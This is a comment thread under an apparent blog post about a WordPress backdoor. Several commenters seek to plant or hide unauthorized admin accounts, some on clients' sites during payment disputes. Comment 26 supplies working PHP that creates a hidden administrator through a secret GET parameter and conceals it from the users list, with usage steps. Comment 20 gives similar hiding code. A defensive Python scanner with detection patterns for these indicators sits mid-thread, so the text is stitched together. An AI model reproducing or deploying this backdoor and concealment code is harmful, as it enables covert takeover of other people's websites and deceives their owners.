49 Responses

  1. Marco, June 17, 2013 at 17:29

    Scary. Will have a second and third look from now on when I install plugins. Grazzi ħafna 🙂

  2. elzan, June 18, 2013 at 09:07

    wow… it’s scary… we can get it from plugins, right 🙁

  3. AndyiBM, June 18, 2013 at 11:05

    Ditto the above… is there any way to block this sort of backdoor being set up without us knowing?

  4. Steve eMailSmith, June 18, 2013 at 14:12

    There are a few footprints in this code (or any similar one, using this method) that could be used to scan for the malicious code in plugins.

    One would be the link to the registration script: 'wp-includes/registration.php'
    Another would be the setting of the privileges: set_role( 'administrator' );

    Of course, there could be many other ways to do the job, so ultimately, a manual vetting by a security expert like Jean suggested is the best way to stay safe.

    ~Steve

  5. CitronEvanescentDavid, June 18, 2013 at 14:16

    You can also add some triggers to your database to prevent admin user creation. That would leave the backdoor useless.

  6. Luis Alejandre, June 18, 2013 at 15:55

    Oh well, I will have to think of another one…

    I was almost ready to release my brand new “Please Screw Up My Site” plugin including this very same code. You have spoiled my worldwide product launch! 😉

    Now seriously, Jean, that was a good one. Like others said before: scary.

  7. Brett Lee, June 20, 2013 at 18:11

    Created this file at root with 644 permissions. Does not work.

    How to use this?

  8. fesada3, June 20, 2013 at 21:20

    Hi, nice info. I’m just learning PHP.
    Can you explain what this line does:
    if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' )
    What I believe is that you send a GET request to the URL where the code is found, where the md5 hash of backdoor is ’34d1f91fb2e514b8576fab1a75a89a6b’, which will then create the backdoor. Am I right?
    Thanks

  9. Mathew Porter, June 26, 2013 at 18:22

    It does open your eyes on the lack of vetting of plugins and the miscellaneous code that could be installed unsuspectingly.

  10. Tareq, June 28, 2013 at 00:09

    The code should be

    😀

  11. Ignatz, June 28, 2013 at 22:52

    Hi!

    Sorry, but it probably doesn’t work because the file ‘wp-includes/registration.php’ was deprecated in WordPress 3.1.

    Did you test it?

  12. mashermack, August 29, 2013 at 19:14

    I wonder if the wp_create_user() does trigger the notification email to the admin about the user creation

  13. mundana, September 17, 2013 at 00:57

    I tried it in my own WP and it worked, although when entering as admin, in the users list I can see the other admin, mr_admin. Is there a way to hide it?

    1. Dan, May 3, 2014 at 14:16

      use CSS to hide anything in the admin area to cover your tracks after such hacks

    2. Dan, May 3, 2014 at 14:17

      or a hook into the display of the users page could do it more gracefully

  14. Chacha Kairu, October 26, 2013 at 00:49

    Where do you place the code please

  15. Chacha Kairu, October 26, 2013 at 11:53

    Got it lol!.. It’s working. Thanks a million

  16. jayz, November 6, 2013 at 08:18

    hello there,

    nice code bro .. I want to know, if WP has user activation, how we activate the user by this .. I added the code, it successfully creates the user, but I can’t access because the user is not activated.

    thanks ..
    have a nice day

  17. christophermccoy, November 18, 2013 at 19:33

    I have seen something like this, but not creating an admin account; once the theme was activated it sent some sort of notice to the author.

  18. applemonz, January 19, 2014 at 10:10

    This code is not working

  19. Paul, January 24, 2014 at 13:21

    Unfortunately, it is working. Boy, this really opened my eyes. Thanks for posting!

  20. Nick Meisher, January 29, 2014 at 08:16

    To hide the new admin user is more than just hiding them in the User list since if the real admin signs in and tries to edit a page that you are editing using the backdoor account, they will get a message that “mr_invisible_admin” has been busy editing that page for a long time now and for them to patiently wait their turn. That may clue them in that they aren’t alone anymore on their private blog.

    But the code to hide a user with a specific login name from user searches is the following, which can be added to the functions.php file.

    /** hides a user with a specific login name from user search queries **/
    function w45345p_hide_specific_user( $user_search ) {
        global $wpdb;
        $user_search->query_where = str_replace(
            'WHERE 1=1',
            "WHERE 1=1 AND {$wpdb->users}.user_login != 'mr_admin'",
            $user_search->query_where
        );
    }
    add_action( 'pre_user_query', 'w45345p_hide_specific_user' );
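Steve's footprint list (comment 4) and the pre_user_query hiding hook in the comment above are the kind of literal indicators a site owner can sweep a plugin tree for. The scanner below is an added example, not code from the thread or from WordPress; its regexes are heuristics I chose, and the two PHP sample strings are constructed fixtures (one modelled on the snippet quoted later in this thread, one ordinary admin-only user creation).

```python
import re
from pathlib import Path
# Heuristic indicators drawn from the comments above: deprecated registration include,
# administrator role assignment, md5($_GET[...]) trigger, user creation, and the
# pre_user_query hook that filters one login name out of the Users list.
INDICATORS = {
    "deprecated_registration_include": re.compile(r"wp-includes/registration\.php"),
    "admin_role_assignment": re.compile(r"set_role\s*\(\s*['\"]administrator['\"]\s*\)"),
    "get_param_hash_trigger": re.compile(r"md5\s*\(\s*\$_GET\s*\["),
    "user_creation": re.compile(r"\bwp_create_user\s*\("),
    "user_list_hiding_hook": re.compile(r"add_action\s*\(\s*['\"]pre_user_query['\"]"),
    "user_login_filter": re.compile(r"user_login\s*!=\s*['\"]"),
}

def scan_source(src: str) -> list:
    """Return the names of the indicators present in one PHP source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(src)]

def risk_level(hits: list) -> str:
    """A single hit is often legitimate; three or more together warrant manual review."""
    if len(hits) >= 3:
        return "high"
    return "review" if hits else "clean"

def scan_plugin_dir(root: Path) -> dict:
    """Scan every .php file below root; map relative path -> hits, files with hits only."""
    report = {}
    for path in sorted(root.rglob("*.php")):
        hits = scan_source(path.read_text(errors="replace"))
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report

# Constructed samples (not real plugins): one modelled on the snippet quoted in the
# thread, one ordinary admin-only user creation that should only be marked for review.
SAMPLE_SUSPICIOUS = """<?php
function yourbackdoor() {
    if ( md5( $_GET['yourbackdoor'] ) == 'HASH_PLACEHOLDER' ) {
        require( 'wp-includes/registration.php' );
        $user = new WP_User( wp_create_user( 'newadmin', 'some!pass!' ) );
        $user->set_role( 'administrator' );
    }
}
add_action('pre_user_query', 'hide_user');
function hide_user($q) { global $wpdb; $q->query_where .= " AND {$wpdb->users}.user_login != 'newadmin'"; }
"""
SAMPLE_BENIGN = """<?php
if ( current_user_can('create_users') ) { wp_create_user( sanitize_user($_POST['u']), wp_generate_password() ); }
"""
```

Run scan_plugin_dir(Path('wp-content/plugins')) on a site checkout and review every file rated high by hand. As a later comment in this thread points out, obfuscated variants will not match literal patterns like these, so a clean result is not proof of absence.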

  21. david Delatorre, February 7, 2014 at 20:59

    Jean,
    I did this to a client’s website that I thought was not going to pay me, and after many months he paid. I went to the functions.php and removed it, and now that I use all the real IDs and passwords, I can’t access admin.php; after entering the credentials the page turns blank and it doesn’t go anywhere… please help me…
    Thank you in advance,
    David Delatorre

  22. Vikas - Web Designer in Rockingham

    Nice post Jean but don’t give them ideas. lol.

    Usually these backdoors are not easy to find and are obfuscated.

    I did a post on it a few months ago:

    http://oziti.com.au/case-study/wp-security-removing-wordpress-backdoor

    and since I wrote that post, I’ve had several people visiting this post everyday and about 20 of them contacting me to clean it up.

    The code you’ve mentioned above is really hard to find. Once you’ve found it, you need to have skills to de-obfuscate it. By the time you’ve figured it all out, your client’s blood pressure is really high because his website is on the front page of a Turkish hacking website (real story).

    Not a lot of fun. 🙁

  23. Gozzie, April 29, 2016 at 08:01

    It’s not working anymore on 4.5.1; can I have an update on the code?
    It’s for when my boss will not pay for making his website. (He wants to pay after I uploaded and made him admin…

  24. danny, May 1, 2016 at 09:50

    Wow guys, stop adding back doors; just hide the user name from the customer, like that it is not a risk, the customer will never know. I have been doing this for a long time and never had a single issue, and if a customer asks me to repair anything I just enter, knowing my information is there, not causing damage to anyone.

    Remember just hide your user name and you will be safe.

    1. Gozzie, May 6, 2016 at 02:23

      And how do I hide it?

      add_action( 'wp_user_query', 'yoursite_wp_user_query' );
      function yoursite_wp_user_query( $user_search ) {
          global $current_user;
          $username = $current_user->user_login;

          global $wpdb;
          $user_search->query_where = str_replace( 'WHERE 1=1',
              "WHERE 1=1 AND {$wpdb->users}.user_login != ''", $user_search->query_where );
      }

      is not working

  25. phil, May 9, 2016 at 12:19

    And how to hide your account from the owner?

  26. IceIce Baby, June 8, 2016 at 21:16

    Best way to accomplish a superadmin without notifying the default admin when a new user account is created is to do it this way (add to functions.php):

    add_action( 'wp_head', 'yourbackdoor' );
    function yourbackdoor() {
        if ( md5( $_GET['yourbackdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
            require( 'wp-includes/registration.php' );
            if ( !username_exists( 'newadmin' ) ) {
                $user_id = wp_create_user( 'newadmin', 'some!pass!' );
                $user = new WP_User( $user_id );
                $user->set_role( 'administrator' );
            }
        }
    }
    add_action( 'pre_user_query', 'yoursite_pre_user_query' );
    function yoursite_pre_user_query( $user_search ) {
        global $current_user;
        $username = $current_user->user_login;

        if ( $username != 'newadmin' ) {
            global $wpdb;
            $user_search->query_where = str_replace( 'WHERE 1=1',
                "WHERE 1=1 AND {$wpdb->users}.user_login != 'newadmin'", $user_search->query_where );
        }
    }

    …then go to http://www.yourdomain.com?yourbackdoor=go and have it create the account. When you log in to the original admin account, this new superadmin account will NOT be visible in the users list. Now, just log out of the old admin account, and log in to your new account that was created above. You should see your account now in the users list when logged in to the superadmin account. From this point, you can do a lot of things behind the scenes, like install “Hide Plugins” and “Admin Menu Editor”, and the normal admin account (i.e. the client) will never know.

  27. Eric, June 9, 2016 at 11:56

    This did not work for me. Too bad, this could be useful.

  28. ozmeu, June 9, 2016 at 13:25

    Indeed, why can’t we find a working one? Where are the hardcore scripters ☺

  29. Mediablitz, September 7, 2018 at 10:00

    This backdoor does not work on WP 4.8.7? Any idea why not?
